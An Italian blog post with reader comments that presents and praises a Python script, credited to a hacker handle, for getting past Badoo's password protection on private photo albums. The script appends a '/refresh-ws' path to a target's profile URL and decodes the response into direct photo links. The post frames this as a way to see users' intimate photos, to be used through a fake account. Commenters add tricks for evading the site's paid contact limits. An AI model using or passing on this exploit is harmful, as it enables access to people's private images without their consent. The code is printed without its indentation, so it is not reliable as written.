Una bella ragazza conduce una doppia vita, di giorno timida studentessa, di sera giovane modella che ama mostrare le sue bellezze per qualcuno. Badoo offre la possibilità di contattare chiunque e farsi contattare da chiunque, senza distinzione di sorta. C’è la possibilità di caricare video e immagini e mostrare di se anhe i più piccoli “segreti”.
C’è anche la possibilità di “nascondere” ciò che si decide di mostrare, infatti attraverso l’uso di una password, da consegnare al contatto di fiducia, si può proteggere il proprio book. Un gruppo di “hackers” ha scritto un codice attraverso il quale è possibile bypassare la password di protezione. Basta un account “fake”, un pò di pazienza nella ricerca della pagina del codice e tanta fantasia nel cercare contatti che proteggono password.
Il codice è scritto in Python:
#!/usr/bin/python
import time
import os
print """
***************************
****** Badoo Hack *********
***************************
****** By ^4st3r1X^ *******
***************************
"""
def urldecode():
decode = raw_input("inserisci il codice completo trovato sulla pagina web: \n>")
print "\n\nAttendi..."
print "Decodifica link in corso..."
sostit = decode.replace("\\","")
sostit2 = sostit.replace('"'," ")
sostit3 = sostit2.replace(":{","")
sostit4 = sostit3.replace("{ errno :0, data ","")
sostit5 = sostit4.replace("},","")
sostit6 = sostit5.replace("}","")
print "Decodifica link completata."
if sostit6.find("url") != -1:
print "Semplifico lettura link..."
sostit7 = sostit6.replace("url :", "url: ")
sostit8 = sostit7.replace("url","\nurl")
print "Semplificazione lettura link terminata."
print "Terminato."
print "\n\n________________ links _________________________"
print sostit8
print "_________________links _________________________\n\n"
else:
print "\n\n________________ links _________________________"
print sostit6
print "_________________links _________________________\n\n"
d = raw_input("\nSe hai gia' effettuato il login su http://badoo.com/ scrivi 'c'\naltrimenti se vuoi effettuare il login premi 'e': \n")
if d == "e":
login = "http://badoo.com/signin/?sold1=4v8lRnrMZ05bsDXwO1u.6_eJcFQhaW2m"
print "Apertura firefox in corso..."
os.popen("firefox %s &" % (login))
time.sleep(3)
hack = "/refresh-ws"
time.sleep(3)
link = raw_input("Inserisci il link dell' utente con le foto protette da password(Es. http://nick.badoo.com/Ur74jsm): ")
exploit = link+hack
if link.find("http://") != -1:
print "Apro firefox..."
time.sleep(2)
os.popen("firefox %s &" % (exploit))
time.sleep(3)
urldecode()
else:
print "\nurl non valido(Es. http://nick.badoo.com/Ur74jsm)\n"
urldecode()
if d == "c":
hack = "/refresh-ws"
link = raw_input("Inserisci il link del utente con le foto protette da password(Es. http://nick.badoo.com/Ur74jsm): ")
exploit = link+hack
if link.find("http://") != -1:
print "Apro firefox..."
time.sleep(2)
os.popen("firefox %s &" % (exploit))
time.sleep(3)
urldecode()
else:
print "\nurl non valido(Es. http://nick.badoo.com/Ur74jsm)\n"
urldecode()
while 1:
a = raw_input("scrivi 'esci' per uscire oppure 'r' per continuare ad usare il decodificatore di links: ")
if a.find("esci") != -1:
print "Uscita in corso"
exit()
if a.find("r") != -1:
hack = "/refresh-ws"
link = raw_input("Inserisci il link del utente con le foto protette da password(Es. http://nick.badoo.com/Ur74jsm): ")
exploit = link+hack
print "Apertura firefox in corso..."
time.sleep(1)
os.popen("firefox %s &" % (exploit))
time.sleep(3)
decode = raw_input("inserisci il codice completo trovato sulla pagina web: \n>")
print "\n\nAttendi..."
print "Decodifica link in corso..."
sostit = decode.replace("\\","")
sostit2 = sostit.replace('"'," ")
sostit3 = sostit2.replace(":{","")
sostit4 = sostit3.replace("{ errno :0, data ","")
sostit5 = sostit4.replace("},","")
sostit6 = sostit5.replace("}","")
print "Decodifica link completata."
if sostit6.find("url") != -1:
print "Semplifico lettura link..."
sostit7 = sostit6.replace("url :", "url: ")
sostit8 = sostit7.replace("url","\nurl")
print "Semplificazione lettura link terminata."
print "Terminato."
print "\n\n________________ links _________________________"
print sostit8
print "_________________links _________________________\n\n"
else:
print "\n\n________________ links _________________________"
print sostit6
print "_________________links _________________________\n\n"
else:
print "Sintassi errata.Scrivi 'esci' per uscire oppure 'r' per continuare ad usare il decodificatore di links."
Il codice è molto semplice di per se, ma geniale. L’uso di tale codice è da utilizzare attraverso un interprete Python, per chi usa Linux le cose sarebbero molto più semplici, per chi usa Windows altrettanto, ma con qualche “giro” in più da affrontare.
Fondamentalmente non è difficile l’uso del codice in se, e per una sorta di rispetto nei confronti di chi ha sicritto e pubblicato il codice stesso, eviterò la diffusione dell’esecuzione di tale codice. Il mio complimento va all’Hacker che ha scritto tale codice e ha scoperto la falla di Badoo. A tutt’oggi non so se il problema sia stato “fixato”.
Complimenti ^4st3r1X^.
ma badoo ha gia chiuso la falla???
Ho trovato la notizia in rete, così come lo script, volevo provarlo in collaborazione con Lobotomia, Negatron e Vilgio. Inoltre non ho un account con Badoo e prima di testarlo dovrei crearmene uno…fake
se hai un pò di pazienza tra qualche giorno posso dirtelo…
Ma io non vglio provarlo! Io odio Badoo anche nei bug!!
muahuuhahua a dirla tutta nemmeno a me interessa…
odio Badoo e tutte le cose simil Badoo… e social network ecc ecc…
E poi a quanto comunicatomi il problema è stato fixato, ergo….possiamo risparmiarci il problema.
Si, davvero un codice interessante :]
Io cazzeggiando in giro per la rete ho scoperto un mini-bug e non serve nemmeno essere degli hacker per utilizzarlo. Dopo aver superato il limite di 20 contatti giornalieri, basta una semplice richiesta ad un ALBUM PRIVATO di qualcuno per bypassare il fastidioso “Oops, hai superato il limite giornaliero” che compare nella chat dal 21° in poi. Altrimenti bisognerebbe pagare 2€ per richiedere altri 20 contatti in più. Che dite? Non se ne sono accorti, eh?
VIDEO:
Per bypassare il limite di 20 contatti basta cambiare la nazione di provenienza e mettere NUOVA ZELANDA!! la badoo non si paga!
Grande, non c’avevo pensato alla differenza di giurisdizione
COME SI POSSONO DISDIRE I SUPERPOTERI? COSTANO UNA CIFRA E NON SERVONO A UN… GRAZIE. Spero che qualcuno abbia la soluzione…
volete sempre super poteri…basta mettere come profilo residenza un qualsiasi stato fuori dall’italia…con s.marino non funziona.
puoi entrare d’appertutto passa i superpoteri…però se vuoi vedere la tua reale cartella italiana, li sei fregato ..e non capisco il perchè…
inoltre:”basta una semplice richiesta ad un ALBUM PRIVATO di qualcuno per bypassare il fastidioso “Oops, hai superato il limite giornaliero”… non funziona ..lo fa solo con una persona,cioè con quella che tu vuoi vedere le foto…e poi non ti fa scrivere quel che vuoi…e con le altre persone..ritrovi di nuovo il limite…BISOGNA ESCOGITARE UN ALTRO METODO…
non credo che non ci sia un qualche modo per disattivare sto fattore superpoteri imbecilli….ci vorrebbero veri hacker…qelli si che san fare tutto